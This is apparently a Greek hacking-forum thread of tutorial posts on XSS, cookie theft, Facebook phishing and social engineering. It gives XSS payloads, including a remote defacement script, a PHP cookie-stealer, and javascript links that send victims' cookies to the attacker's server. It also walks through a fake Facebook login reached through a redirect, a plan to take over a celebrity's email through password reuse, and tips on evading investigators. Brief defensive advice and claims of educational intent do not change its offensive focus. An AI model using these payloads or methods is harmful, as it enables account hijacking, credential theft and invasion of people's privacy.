προς τον server!Σε ένα σχεδιάγραμμα θα ήταν κάπως έτσι: Client - > http://www.server.com/make_order.php?categ=pc&ThinkPad+80x=COD&submit=Order (the get request) - > Server , και το σχέδιο έχει ήδη γίνει! |=-----------------------------------------------------------------------------------=| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |[ Case c ) ..of cookie stealing + xss website vulnerability ]| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |=-----------------------------------------------------------------------------------=| Τι γίνεται εδώ..?Ναι , εδώ είναι το "κλασσικό" phishing , όταν δηλαδή μια ιστοσελίδα έχει "τρύπα" ασφαλείας , και μπορούμε να το 'xxs-άρουμε'!Προκειμένου να ελέγξουμε πότε και αν ένα σύστημα έχει XSS bug , τότε θέλουμε μια εντολή java-script , την οποία όλοι τυχαίνει να γνωρίζουμε!Ναι είναι η παρακάτω εντολή , [ <script>alert("XSS");</script> ]* .Αυτήν την εντολή μπορούμε να την χρησιμοποιήσουμε απευθείας σε κάποια μεταβλητή στο URL , είτε είναι αριθμός , είτε είναι γράμματα , και όχι μόνο!Επίσης , πολλοί εντοπίζουν αδυναμίες XSS , χρησιμοποιώντας αυτόν τον μιας γραμμής κώδικα μέσα σε φόρμες search πάνω στις ιστοσελίδες , καθώς στις περισσότερες ιστοσελίδες , ότι "δίνουμε" στο search form , περνάει στο URL , οπότε , στην ουσία πάλι στο url βρισκόμαστε με την εντολή , με τη διαφορά όμως το χρησιμοποιούμε έτσι , όταν πολλές φορές ψάχνουμε στην ιστοσελίδα μεταβλητές αλλά κατα συνέπεια δεν υπάρχουν!Έτσι η φόρμα search , τις περισσότερες φορές δημιουργεί (αναγκαστικά) , προκειμένου να ψάξει στα περιεχόμενα του συστήματος με τη διαφορά ότι συμπεριλαμβάνει και αυτήν την "πονηρή" εντολή , με αποτέλεσμα να βλέπουμε αν έχει κενό ασφαλείας ή όχι!Έστω λοιπόν , ότι βρίσκουμε ένα XSS bug ,σε κάποια ιστοσελίδα , πως θα μπορούσαμε να το εκμεταλλευτούμε? Το xss check , μπορεί επίσης να γίνει και με αυτόν τον τρόπο <script>alert(String.fromCharCode(88,83,83))</script> Eδώ όπως βλέπουμε , είμαστε στην περίπτωση της φόρμας search!* Πριν προχωρήσω στα cookies , ας πω και πόσο εύκολο είναι να γίνει ένα XSS-defacement! Την ιστοσελίδα , την "κάλυψα" καθώς το bug υπάρχει ακόμη και δεν έχει ενημερωθεί κανένας , και δεν θα ήταν καλό να την εκθέσω καθώς δεν είναι μια ασήμαντη!(ας πούμε). Η εντολή <script src=//mysite.com/defacer.js></script> , που περνάει είναι κατανοητή πιστεύω , δεν έχει κάποια δυσκολία , στην ουσία το η σελίδα deface είναι java κώδικας ανεβασμένος σε ένα remote page.Aν τώρα αναρωτιέστε γιατί να κάνουμε ένα dynamic deface, μπορώ να πω ότι μπορούμε πολύ πιο απλά να εκφράσουμε την διαφωνία μας ή οτιδήποτε θέλουμε , χωρίς να χαλάσουμε τίποτα.Το λίνκ μπορεί να αφεθεί ή να σταλεί προκειμένου να γίνει αντιληπτό. Ας συνεχίσουμε με τα cookies! Kαταρχήν , για να εμφανίσουμε τα cookies μας , σε μια xss bugged ιστοσελίδα , αρεκί να περάσουμε την εξής εντολή <script>alert(document.cookie)</script> .Here it is: Σύμφωνα με wikipedia: A cookie, also known as a web cookie, browser cookie, and HTTP cookie, is a piece of text stored by a user's web browser. A cookie can be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing text data. A cookie consists of one or more name-value pairs containing bits of information, which may be encrypted for information privacy and data security purposes. The cookie is sent as an HTTP header by a web server to a web browser and then sent back unchanged by the browser each time it accesses that server. Cookies may be set by the server with or without an expiration date. Cookies without an expiration date exist until the browser terminates, while cookies with an expiration date may be stored by the browser until the expiration date passes. Users may also manually delete cookies in order to save space or to avoid privacy issues. As text, cookies are not executable. Because they are not executed, they cannot replicate themselves and are not viruses. However, due to the browser mechanism to set and read cookies, they can be used as spyware. Anti-spyware products may warn users about some cookies because cookies can be used to track people—a privacy concern, later causing possible malware. Αυτός είναι ο στόχος μας!Tα cookies αποθηκεύονται στον τρέχων φυλλομετρητή με τον οποίο επισκεπτόμαστε μια σελίδα , ώστε να μας θυμάται την επόμενη φορά που θα επισκεφθούμε την ιστοσελίδα!Τα cookies , χωρίζονται σε κάποιες κατηγορίες!Lets see: (source : google analytics!) 1)The __utma Cookie This cookie is what’s called a “persistent” cookie, as in, it never expires (technically, it does expire…in the year 2038…but for the sake of explanation, let’s pretend that it never expires, ever). This cookie keeps track of the number of times a visitor has been to the site pertaining to the cookie, when their first visit was, and when their last visit occurred. Google Analytics uses the information from this cookie to calculate things like Days and Visits to purchase. 2)The __utmb and __utmc Cookies The B and C cookies are brothers, working together to calculate how long a visit takes. __utmb takes a timestamp of the exact moment in time when a visitor enters a site, while __utmc takes a timestamp of the exact moment in time when a visitor leaves a site. __utmb expires at the end of the session. __utmc waits 30 minutes, and then it expires. You see, __utmc has no way of knowing when a user closes their browser or leaves a website, so it waits 30 minutes for another pageview to happen, and if it doesn’t, it expires. 3)The __utmz Cookie Mr. __utmz keeps track of where the visitor came from, what search engine you used, what link you clicked on, what keyword you used, and where they were in the world when you accessed a website. It expires in 15,768,000 seconds – or, in 6 months. This cookie is how Google Analytics knows to whom and to what source / medium / keyword to assign the credit for a Goal Conversion or an Ecommerce Transaction. __utmz also lets you edit its length with a simple customization to the Google Analytics Tracking code. 4)The __utmv Cookie If you are making use of the user-defined report in Google Analytics, and have coded something on your site for some custom segmentation, the __utmv cookie gets set on the person’s computer, so that Google Analytics knows how to classify that visitor. The __utmv cookie is also a persistent, lifetime cookie. Έτσι λοιπόν το συνήθες κόλπο , που γίνεται με το phishing είναι να "τσιμπήσουμε" τα cookies του θύματος και να εισέλθουμε χωρίς να είμαστε εγγεγραμμένοι χρήστες στην ιστοσελίδα που βρίσκεται το θύμα.Ναι , να μπούμε με τον λογαριασμό του!(impersonation!) Χρειαζόμαστε ξανά έναν server ώστε να ανεβάσουμε τα ακόλουθα 3 αρχεία! Ένας λοιπόν απλός κώδικας που χρησιμοποιείται για αυτήν τη δουλειά είναι ο εξής! <?php $cookie = $_GET["cookie"]; //εδώ είναι η σημαντικότερη λειτoυργία , με GET request παίρνει τα cookies του θύματος // $file = fopen('lafyra.txt', 'a'); fwrite($file, $cookie . "\n\n"); ?> Στην συνέχεια , δημιουργούμε ένα αρχείο με όνομα lafyra.txt , όπου θα περιμένουμε τα μπισκοτάκια του θύματος! Και το τελευταίο αρχείο θα είναι το δόλομα ας πούμε!Με τον ακόλουθο κώδικα: <a href="javascript:document.location='http://www.mysite.com/stealer.php?cookie='+document.cookie;">click here!!!</a> Αυτό λοιπόν το αρχείο πρέπει να στείλουμε με κάποιον τρόπο στον θύμα-χρήστη ώστε μόλις το πατήσει να εκτελέσθούν τα δικά του cookies , και στην συνέχεια να αποσταλλούν σε εμάς!Η αποστολή του λίνκ μπορεί να γίνει με πολλούς τρόπους , ένας από τους οποίους είναι με email!Βάζοντάς το και φυσικά μέσα σε hyperlink , ώστε να μην φαίνεται! *Σημείωση*.Ακόμη καλύτερα θα ήταν να χρησιμοποιήσουμε την παρακατω εντολή <a href="" onMouseover="javascript:document.location='http://www.myserver.com/stealer.php? cookie='+document.cookie;">clickme</a>" , όπου η απόκτηση των cookies θα γίνόνταν χωρίς , να κάνει κλικ ο χρήστης , παραμόνο να περάσει τον κέρσορα πάνω από το λίνκ! *Σημείωση*:(το cookie αυτο *δεν* είναι της ιστοσελίδας που δείχνω παρακάτω!) Έτσι έστω ότι είμαστε εδώ logged in: Με τον cookie editor (firefox addon -> https://addons.mozilla.org/el/firefox/addon/573/) , κάνουμε edit την ιστοσελίδα μας και προσθέτουμε το cookie που μόλις πήραμε! Και εδώ έχουν όλα γίνει με επιτυχία! *Σημείωση*. Το γεγονός ότι είμαστε μέσα στον στόχο , στο account του χρήστη χρησιμοποιώντας το cookie του, σημαίνει ότι θα είμαστε , όσην ώρα βρίσκεται και το θύμα μας συνδεδεμένο!Όταν φυσικά κάνει logout το ίδιο θα ισχύσει και για εμάς!Για αυτό , ποτέ δεν θα πρέπει να μένει ανοιχτό το session από τις ιστοσελίδες που κάνετε login!Πάντα κάνουμε *logout*! Εάν , τώρα μιλάμε για το πως , μπορούμε να έχουμε μια αποτελεσματική ασφάλεια , αυτό είναι για άλλη μια φορά σχετικό , αφού ποτέ δεν ξέρεις από που θα έρθει ..το χτύπημα!Δεν παρα- μένουμε όμως αδρανείς , ένα αποτελεσματικό script είναι το noscript(http://noscript.net/) , το οποίο blockαρει κάθε script που τρέχει στην ιστοσελίδα που είμαστε.Οι ρυθμίσεις του και η ασφάλεια που παρέχει φυσικά εξαρτώνται από το πως το θέλει κάθε φορά ο χρήστης!Δεν ανοίγουμε ποτέ untrusted links , καθώς δεν υπάρχει λόγος , εκτός αν είμαστε τόσο περίεργοι , τότε μπορούμε να το κάνουμε με έναν πιο ασφαλή τρόπο, πχ χρησιμοποιώντας μια εικονική μηχανή!Κανουμε εκκαθάριση τα cookies μας από τον ανάλογο φυλλομετρητή!Για εμένα η μεγαλύτερη ασφάλεια είναι μόνο η παραμονή μας στην ενημέρωση και στα update...και στην οργάνωση του συστήματος , έχοντας επίγνωση κάθε φορά *τι* κάνουμε και πως δουλεύει το κάθε τι!Η καλύτερη , άμυνα είναι στο τέλος η 'άσπρη' επίθεση.. *Δεν βασιζόμαστε πάντα στην φόρμα search , μπορούμε να δοκιμάσουμε και στην login form αλλά και στην admin form , είναι γενικό αυτό , ότι μας κινεί την περιέργεια!
  8. Παρά , τις προσπάθειες , τις ετοιμασίες και τις προειδοποιήσεις των "μεγάλων" δυνάμεων και παρά τα καινούρια κόλπα που ελπίζουν κάθε φορά να επιφέρουν αποτελέσματα , εγώ από την άλλη , συνεχίζω να βλέπω το ..ίδιο σκηνικό!Μια "τρύπα" στο νερό..
  9. Δεν κατάλαβα τι με ρωτάς?Τι εννοείς "ποιο πράγμα" ..?Πες μου ποιο κομμάτι δεν κατάλαβες και θα σε βοηθήσω..
  10. Καλησπέρα p0wnbox , σας παρουσιάζω αυτό το tutorial , γράφοντας το κάτω από τρελές ώρες βαρεμάρας.Για άλλη μια φορά θα παίξουμε με το φατσοβιβλίο!Τώρα , ίσως πολλοί να αναρωτηθούν τον λόγο για τον οποίο θα "περιτριγυρίζουμε" στο Facebook?Ο λόγος λοιπόν είναι ότι το Facebook σαν χώρος κοινωνικής δυκτύωσης , αυτόματα προσφέρει και την καλύτερη ευκαιρία για κοινωνική μηχανική!(social enginnering) , και βεβαίως η κοινωνική μηχανική είναι σχεδόν ο σπουδαιότερος παράγοντας στο phishing.Θα δούμε , πως , λοιπόν μπορούμε να πείσουμε κάποιον χρήστη ή και πολλούς μαζί , ακόμη καλύτερα να έρθουν να παίξουν με εμάς κάποιο παιχνίδι στο facebook , πχ το πόκερ ώστε να μπουν μέσα σε application(facebook apps) , στην συνέχεια να τους καθοδηγήσουμε με μερικά redirections(ανακατευθύνσεις) , με αποτέλεσμα να πέσουν στα χέρια μας τα στοιχεία τους ή αλλιώς τα credentials(username + password).Εμάς , τώρα μας ενδιαφέρει να έχουμε ένα free web server ή ακόμη και μια δική μας ιστοσελίδα , στην οποία μπορούμε να δουλέψουμε φτιάχνοντας ψεύτικες ιστοσελίδες , αλλά φαινομενικά πιστευτές από τους χρήστες!Έστω λοιπόν ότι έχετε,διαβάσει και μία φορά σχετικά με "facebook phishing" αυτός ο οδηγός θα είναι πολύ πιο έυκολος στην κατανόηση και στις μεθόδους που θα συμπεριλαμβάνονται.Πάμε να ξεκινήσουμε. [1]Ετοιμάζοντας την παγίδα με javascript + redirection. Ωραία , λοιπόν , μόλις προσθέσαμε επιπλέον κώδικα javascript ο οποίος θα μας βοηθήσει με εκείνο ..το θέμα της , μηχανικής!Τελικός μας στόχος είναι να παρασύρουμε το θύμα να προσγειωθεί στην σελίδα του Facebook όπου έχει το πόκερ.Εδώ μιλάμε , για την html , όταν δηλαδή θα έχει ήδη χάσει τα credentials και θα τα έχουμε ...εμείς στην κατοχή μας.Στην ουσία όμως δεν θα γίνει έτσι αλλά θα βρεθεί μόνο με ένα αθώο login!Βέβαια, αυτό που περογράφεται εδώ δεν είναι και εντελώς , εύκολο αφού πάντα υπάρχει η πιθανότητα να 'πέσουμε' σε ψαγμένο και παρατηρητικό χρήστη.Αρκεί λοιπόν , να παρατηρήσει το url και να αμφισβητήσει την αυθεντία του!Φυσικά ,όχι μόνο τώρα αλλά γενικά σε κάθε phishing το url είναι σε θέση να καρφώσει τον cracker και κάποιος ψαγμένος χρήστης να καταλάβει ότι πρόκειται να πέσει θύμα.Το url λοιπόν απλά δεν θα είναι ίδιο με πχ του facebook.com.Αυτό είναι το μυστικό της απάτης.Αλλά , το θέμα είναι ότι η απάτη 'ψαρέματος' μπορεί να γίνει με πολλούς και ποικίλους τρόπους , τρόποι οι οποίοι είναι πολύ δύκολο να γίνουν αντιληπτοί ακόμη ...και από τους ψαγμένους χρήστες.Πάμε τώρα να δούμε εκείνη τη σελίδα με το πόκερ. [2]Επίτευξη Στόχου. Mόλις ετοιμάσαμε και το δεύτερο κομμάτι , το οποίο και αυτό που οδηγεί στο login_page του facebook αλλά όχι στο αληθινό.Ναι , είναι εκείνη , η αμέριμνη ιστοσελίδα που περιμένει να κάνει login ο ενδιαφερόμενος με τα credentials και στην συνέχεια ως δια μαγείας να έρθουν σε εμάς.Όχι , δεν είναι ούτε δια μαγείας ούτε εκ ουρανού , είναι απλώς η λογική.Η λογική είναι το δυνατότερο πράγμα που μας επιτρέπει να πετυχαίνουμε τον σκοπό μας.Ας ξεκινήσουμε να παίξουμε πόκερ! Πως θα χρησιμοποιήσουμε όλο το παραπάνω?Απλά. Κοιτάξτε , στο Facebook υπάρχει ένα λίνκ που χρησιμοποιείται για redirection από τους χρήστες είτε για να τους πηγαίνει στα λεγόμενα Facebook apps , οι εφαρμογές του φατσοβιβλίου , είτε τους στέλνει οπουδήποτε πατήσει ο καθένας!Εδώ , λοιπόν , θα έρθουμε και θα αφήσουμε ένα αθώο λίνκ το οποίο υποτίθεται ότι θα καλεί τους χρήστες να παίξουν παιχνίδια.Το λίνκ λοιπόν που κάνει redirection είναι το εξής. ' www.facebook.com/l.php?u= ' όπoυ δηλαδή μετά από το ' u= ' τοποθετείται το url της ιστοσελίδας που επιθυμούμε να μεταφερθούμε.Εμείς λοιπόν θα το κάνουμε κάπως έτσι: [ http://www.facebook.com/l.php?u=http://www.eliteoffantasy.net/to_htm_ ] , οπότε οταν θα το δώσουμε στο Facebook στον τοίχο μας και φυσικά καλέσουμε χρήστες να παίξουν όλο και κάποιος θα κάνει τον κόπο να πατήσει και να οδηγηθεί στον phisher!Ας δούμε κάποιες εικόνες! Προσκαλώντας .....κόσμο! Ναι...και ποιος θα έχανε να παίξει πόκερ ακόμη και αν το κακόμοιρο το facebook τον προειδοποιούσε! Και φυσικά αφού πατήσαμε το λίνκ μεταφερθήκαμε εδώ : Εδώ δηλαδή , Μα , όμως όπως μας λέει και το javascript alert θα γίνει redirection κάπου εδώ... Kαι φυσικά βρισκόμαστε στο πόκερ , μα όμως κάπου εδώ γίνεται και ένα τελευταίο redirect αφού πρέπει να επαληθεύσουμε τα credentials για να παίξουμε!Και φυσικά έκανα αυτό εδώ , σε περίπτωση που ο χρήστης / χρήστες είναι ήδη logged in , αλλά εδώ ίσως αναλογιστείτε , αφού πως αλλιώς θα μπορούσαν να πατήσουν το λίνκ αν δεν ήταν logged in?Ας απαντήσω εγώ.Αν το είχαν πατήσει ήδη όσοι ήταν logged in , τότε είναι πολύ πιθανό να έστειλαν το λίνκ και σε αυτούς οι οποίοι δεν ήταν logged in! , πολύ απλά μέσω μιας άλλης υπηρεσίας κοινωνικής δικτύωσης όπως για παράδειγμα το windows live messenger!(το μσν). Και φυσικά , η τελευταία ανακατεύθυνση θα μας προσγειώσει εδώ , στην πλαστή σελίδα login του facebook όπου εκεί θα βάλουμε και τα credentials και θα αποσταλούν σε αυτούς ...που τα περιμένουν εδώ και τόση ώρα : P! Στην συνέχεια , χωρίς καν ... να δούμε το url αν είναι του Facebook θα κάνουμε login όπως κάνουν συχνά οι χρήστες! Και μόλις , πέσαμε θύματα ; -) Αρκετά εύκολα , και πάνω από όλα από ένα παιχνίδι!Να σημειώσω εδώ , ότι δεν επέλεξα το πόκερ ως καλή παγίδα , διαφορετικά μόνο για να γίνει κατανοητή η διαδικασία του 'ψαρέματος'!Φυσικά και παίζει ρόλο, αν θέλουμε να ψαρώσουμε πολλούς ή έναν χρήστη, έτσι λοιπόν θα χτίσουμε και με διαφορετικό την κοινωνική μηχανική!(Συνήθως , προσπαθούμε να οδηγήσουμε έναν χρήστη πάνω σε θέματα που έχουν σχέση γύρω από τα νέα , την επικαιρότητα ώστε να ξεγελαστεί , κάτι το οποίο είναι αρκετά πιο εύκολο μέσα..στο Facebook!Επίσης , πάντα πρέπει να έχουμε επίγνωση του αντίπαλου χρήστη...)
  11. Σήμερα θα δούμε , ένα αρκετά ενδιαφέρον θέμα , το οποίο πιστεύω είναι εύκολο στην κατανόηση αλλά αρκετά δύσκολο στην υλοποίηση!Είναι ένα θέμα (αρκετά) περίεργο, δηλαδή ας το χαρακτηρίσω λίγο απίθανο αλλά αρκετά.."ζωντανό".Αυτή τη φορά , η ανάλυση που θα δούμε περί του θέματος δεν είναι ότι το εύκολο, απαιτεί τουλάχιστον κάποιες βασικές γνώσεις και φυσικά πονηριά!Για να έρθουμε στο προκείμενο , αυτό που θα δούμε είναι σχετικό με την μέθοδο που μπορούμε να εξαπατήσουμε 'Uber' ανθρώπους(και καλά!) , δηλαδή σε κάθε τι που συνεπάγεται οι όροι διάσημος και διάσημη(you know τραγουδιστές , ηθοποιούς ,μεγάλες προσωπικότητες) ώστε να πραγματοποιήσουμε μια επίθεση με σκοπό την παραβίαση προσωπικών δεδομένων- , και στην συνέχεια να δούμε γιατί πρέπει κανείς να έχει τον τίτλο 'Famous' και φυσικά πόσο διαφορετικός μπορεί να είναι ένας τέτοιος άνθρωπος!Σε καμία περίπτωση , δεν θα ήθελα να το 'δείτε' σαν μαύρη γνώση , παρά μόνο με το λευκό χρώμα.Σε αυτό το θέμα , προσπαθώ , πιο πολύ να μπούμε στον τρόπο με τον οποίο μπορεί να σκέφτεται ένας social attacker , τι έχει στο νου του και τι θέλει στην συνέχεια να κατορθώσει.Βεβαίως , αυτό που δείχνω , μπορώ να πω ότι είναι μάλλον(πολύ απίθανο , δηλαδή έως αδύνατο να γίνει με επιτυχία , όχι φυσικά όμως ακατόρθωτο!).Ας μην ξεχνάει κανένας επίσης, ότι επιθέσεις παρόμοιες μέσω κοινωνικής μηχανικής έχουν γίνει αρκετές φορές , οι οποίες πέτυχαν το σκοπό τους.(http://en.wikipedia.org/wiki/Social_engineering_(security)). Αρκετά με τα εισαγωγικά , ήρθε ώρα να το δούμε και στην πράξη!Πρώτο πράγμα που μας ενδιαφέρει σε αυτήν την περίπτωση είναι να μάθουμε όσα μπορούμε για τον στόχο μας!(http://en.wikipedia.org/wiki/Reconnaissance) .Στην συνέχεια θα προσπαθήσουμε να μάθουμε τον τρόπο σκέψης τους και να εξαπατήσουμε το εκάστοτε πρόσωπο με στόχο την εγγραφή του σε κάποια ιστοσελίδα!(πχ με fans!;-).Έχοντας λοιπόν ψάξει αρκετά σε διάφορες τοποθεσίες , και με διαφορετικούς τρόπους αναζήτησης!(βλέπε dorks,και φυσικά το Goolag Scanner!You can google it! ), είμαστε έτοιμοι να εξαπολύσουμε μια επίθεση η οποία τολμώ να πω πως είναι αρκετά blind , αφού μην φανταστείτε ότι περιμένουμε και πολύ τρομαχτικά αποτελέσματα!Ωστόσο , εδώ είναι και το κόλπο!Αν καταφέρουμε να αποκτήσουμε έστω και έναν κωδικό πρόσβασης μαζί με το όνομα και email φυσικά , τότε είναι 80% πιθανών να χρησιμοποιείται ο ίδιος κωδικός και σε email provider(px hotmail,yahoo bla bla bla etc), και έτσι αφού μπούμε εκεί τότε προφανώς θα μάθουμε πάρα πολλά για το υποψήφιο θύμα και φυσικά , θα προχωρήσουμε περισσότερο αφόυ ίσως βρούμε διευθύνσεις , τηλέφωνα , ακόμη και οδό!) Ίσως να ακούγεται λίγο τρομακτική , η όλη ιδέα , αλλά τι να κάνουμε , πάντα μας τραβούσε μια περιέργεια και φυσικά τίποτα δεν είναι ακατόρθωτο!Σαν επόμενο βήμα , θα είναι βάση του τόπου διαμονής ή και έστω καταγωγής του θύματος να βρούμε μία ιστοσελίδα η οποία να έχει σχέση με το αντικείμενο ασχολίας του εκάστοτε στόχου , στην συνέχεια , να την συμβιβάσουμε και αφού μπούμε να καταφέρουμε να την κρατήσουμε υπό την κατοχή μας όσο περισσότερο γίνεται.*** Τώρα , πως θα την παραβιάσουμε για μπούμε σαν διαχειριστές δεν θα αναφερθεί εδώ καθώς θα βγω offtopic!Υπάρχουν αρκετά topic στο φόρουμ για αυτή την υπόθεση.!Οι τακτικές είναι πολλές!Ουσιαστικά , αυτό που μας ενδιαφέρει είναι τι θα κάνουμε ύστερα από την επιτυχή παραβίαση, πως θα δράσουμε στην συνέχεια! Έστω λοιπόν , ότι παραβιάσαμε μια ιστοσελίδα , και είμαστε πλέον 'μέσα' με δικαιοδοσία administrator!Eμάς αυτό που μας ενδιαφέρει , είναι να έχουμε στην ιστοσελίδα το όνομα(username) , τον κωδικό(password) και τέλος το email του θύματος!Αν τώρα σκέφτεστε πως μπορεί να γίνει αυτό , τότε το μόνο που έχω να πω είναι ότι μόνο μια εγγραφή αρκεί!Η πλειονότητα των ιστοσελίδων αποθηκεύει τα τρεία παραπάνω στοιχεία που ανέφερα σε μια βάση δεδομένων του κάθε χρήστη , ακόμη και του ίδιου του διαχειριστή!Ορίστε πως μπορεί να φαίνονται αυτά: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ============= =========== ============================= user:dr0pper | pass:123456 | email:[email protected] | | id=8 ============= =========== ============================= ============== ============ ============================= user:p0wnbox | pass:7891011 | email:[email protected] | | id=9 ============== ============ ============================= =============== ============ ============================= user:haxor | pass:hax0r1 | email:[email protected] | id=10 =============== ============ ============================ =========================== ============================== user:cracker | pass:iam0 | email:[email protected] | | id=11 ============================ ============================= - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Το παραπάνω παράδειγμα βέβαια , ισχύει ύστερα από εγγραφή , όπου φυσικά και είναι ο στόχος μας!Ναι , να πείσουμε το θύμα να κάνει μια αθώα εγγραφή σε ένα site που το ενδιαφέρει!Επίσης , όσο το μεγαλύτερο site στόχος , τόσο περισσότερες πιθανότητες εγγραφής υπάρχουν!Αν καταφέρουμε δηλαδή να πείσουμε το θύμα να κάνει την κίνηση της εγγραφής στην ιστοσελίδα , τότε ο στόχος θα έχει επιτευχθεί!Από τη στιγμή λοιπόν , που θα έχουμε στα χέρια μας ένα πίνακα διαχειριστή , αυτό που μένει είναι να προχωρήσουμε με την κοινωνική μηχανική!Θα σας δείξω , ένα καλό σενάριο κοινωνικής μηχανικής , από που θα πάρουμε πληροφορίες , και που θα φτάσουμε.Ωραία , λοιπόν , υποτιθέμενοι πως έχουμε μια ιστοσελίδα , και σκεφτόμαστε πως να καλέσουμε άτομα , τότε απλά θα κάνουμε την εξής τεχνική!Ας πάρουμε για παράδειγμα , ότι θέλουμε, να εξαπατήσουμε μια X διασημότητα!Αρχικά , επισκεπτόμαστε την ιστοσελίδα , παίρνοντας σαν δεδομένο ότι έχει μια official!Στην συνέχεια , για να μάθουμε περισσότερες πληροφορίες για την ιστοσελίδα αλλά και την διασημότητα , θα κάνουμε έναν έλεγχο στην ιστοσελίδα , ώστε να πάρουμε το email του ιδιοκτήτη , και φυσικά να το χρησιμοποιήσουμε για κοινωνική μηχανική!Προσέξτε! , δεν θα παραβιάσουμε τον λογαριασμό του email , αντιθέτως θα το χρησιμοποιήσουμε σαν πλαστό , και θα ισχυριστούμε ότι ο ιδιοκτήτης της ιστοσελίδας , είμαστε εμείς!Μια ιστοσελίδα για έλεγχο άλλων ιστοσελίδων είναι αυτή : click to zoom Πήρα λοιπόν για παράδειγμα τον επαγγελματία τραγουδιστή Justin-Bieber :P (εντελώς τυχαίο παράδειγμα) .Για αυτήν την ιστοσελίδα , η αναζήτηση στο google έχει τον εξής τύπο : victim_name&surname fan website , κάτι τέτοιο for example :Justin Bieber fan site , η οποία αναζήτηση μας πηγαίνει εκεί που θέλουμε!Τώρα που πλέον μπορούμε να δούμε , το email που χρησιμοποιείται χάρη στο domaintools , ήρθε η ώρα για την κοινωνική μηχανική!Την ιστοσελίδα που θα χρησιμοποιήσουμε για αυτό τον λόγο είναι η εξής: click to zoom Ξεκινήσαμε από ένα fan site για να έρθουμε κοντά στο official όπου και το οποίο έχει (τις περισσότερες φορές) , επαφές με τον κάθε Justin Bieber.Τώρα , πιστεύοντας ότι το δόλωμα τσίμπησε , θα έχουμε πλέον στην ιστοσελίδα μας το email και το password!Θα στραφούμε λοιπόν , προς την ανάλογη υπηρεσία!Πάμε λοιπόν να κάνουμε login , στο yahoo.(υποθετικά!). click to zoom Kαι εδώ βλέπουμε , ότι πλέον βρίσκεται υπό τον έλεγχό μας!Όχι δεν είναι του Justin παρεπιμπτόντος είναι κάποιου άλλου , απρόσεχτου που σημασία δεν έχει!Ο οδηγός , δεν δείχνει πως να βλάψουμε , αντιθέτως να ενημερωθούμε!Και φυσικά , θυμηθείτε , δεν είναι καθόλου δύσκολο να ήταν του Justin η οποιουδήποτε άλλου , διαφορά δεν υπάρχει!;) Σε αυτό το σημείο , φυσικά , η αποστολή μας έχει τελειώσει , αφού είμαστε μέσα στον στόχο!Θέλετε να δείτε λίγο ακόμη που θα μπορούσαμε να πάμε?Ιδού: click to zoom click to zoom Οκ , άντε να πέσαμε και λίγα χιλιόμετρα έξω , δεν μας ενδιαφέρει καθόλου!Αυτό που θα λέγαμε είναι πως είναι πολύ τρομαχτικό και παράλληλα γελοίο , που μπορεί να φτάσει κάποιος αν χρησιμοποιήσει λίγο παραπάνω την λογική του! Εδώ λοιπόν μπορούμε να πούμε , ότι στην πλειονότητα τα συστήματα εγγραφής , έχουν τέτοιου είδους αδυναμίες , αφού μόλις δώσεις τα στοιχεία , αποθηκεύονται στην ιστοσελίδα για τον διαχειριστή και φυσικά τον άλλο ....διαχειριστή ;-).Να έχετε το νου σας τι στοιχεία δίνετε , και που, κάθε φορά κάνετε εγγραφή!Το θέμα , δεν είναι αστείο , μάλλον απαιτεί προσοχή! ***Ναι,οι αληθινοί attackers που ξέρουν την δουλειά τους, όταν παίρνουν τον έλεγχο μιας ιστοσελίδας που τους ενδιαφέρει, το *μόνο* που ποτέ δεν κάνουν είναι ούτε να σβήσουν αρχεία, ούτε να κάνουν το παρεξηγημένο deface/graffiti,ούτε μάλλον να ενημερώσουν κανέναν για την ενέργειά τους , με την προϋπόθεσή να χρησιμοποιήσουν το απομακρυσμένο σύστημα ανάλογα με τις ανάγκες τους , και φυσικά να *μην* γίνουν αντιληπτοί με αποτέλεσμα να χάσουν το box!
  12. Ναι είναι αλήθεια , ότι αναφέρομαι στην ανωνυμία από μεριάς..ενός επιτιθέμενου και όχι σαν απλός pure user που θέλει να έχει κάποιο βαθμό privacy για α,β,γ λόγους.Προσωπικά , δεν έχω αφιερώσει και πολύ χρόνο όσον αφορά τις μεθόδους ανωνυμίας και γενικά είναι ένα θέμα , που θέλω πολύ να ασχοληθώ.Γενικά για εμένα , πιστεύω ότι το καλύτερο για την ανωνυμία αλλά και το κάθε θέμα , είναι να χτίζεις δικές σου τεχνικές και να τις συνεχίζεις , δηλαδή συνδυασμός και σκέψη (συνεχώς!) , για όλο και κάτι ..καλύτερο! B)
  13. Καλησπέρα σε όλους , σκέφτηκα να μοιραστώ αυτό το topic , καθώς φυσικά η ανωνυμία είναι ένα θέμα -κάπως- περίεργο να το πω , δηλαδή , παίζονται πολλά σενάρια για το άν πραγματικά υφίσταται ανωνυμία ή όχι!Τώρα , θα μου πείτε το συγκεκριμένο θέμα που γράφω , είναι γνωστό σε όλους σχεδόν , όλοι πλέον χρησιμοποιούν από ένα έτοιμο tool για να μένουν "θεωρητικά" ανώνυμοι, εγώ αυτό που θέλω φυσικά , είναι η συνεχής ενημέρωση και συζήτηση επί του θέματος web anonymity , όποτε είναι εφικτό. Η ανωνυμία λοιπόν , στο ίντερνετ είναι απλά αδύνατον να βρίσκεται στο 100%.Αυτό βέβαια είναι σχετικό , δεν μπορεί φυσικά να το αποδείξει κανένας.Ωστόσο , η λογική που κυριαρχεί είναι η εξής: Παραβιάζω έναν ιστοτόπο , ο οποίος κατά προτίμηση είναι μεγάλος , δηλαδή το traffic είναι σε μεγάλο βαθμό , και αφού τον παραβιάσω τότε πρέπει να έχω ήδη λάβει μέτρα για την προστασία μου , από απου αλλού?Απο τον ιδιοκτήτη του , και φυσικά από την δίωξη ηλεκρονικού εγκλήματος.Τώρα , αν η ιστοσελίδα έχει να κάνει, με πολύ ζουμερό περιεχόμενο όπως για παράδειγμα , μυστικά , απόρρητα έγγραφα , σπάσιμο μεγάλης ασφάλειας και 0-day exploits τότε , είναι σίγουρο ότι προφανώς θα μας ψάξουν και άλλα παιδάκια , μεγαλύτερα! Τι μπορούμε να κάνουμε λοιπόν , για μια αποτελεσματική ανωνυμία..?Ας ξεκινήσουμε να δούμε κάποιες τεχνικές: 1)Ανωνυμία μέσω web proxy! Τι είναι ένας proxy server? Απόσπασμα από wikipedia: In computer networks, a proxy server is a server (a computer system or an application program) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy 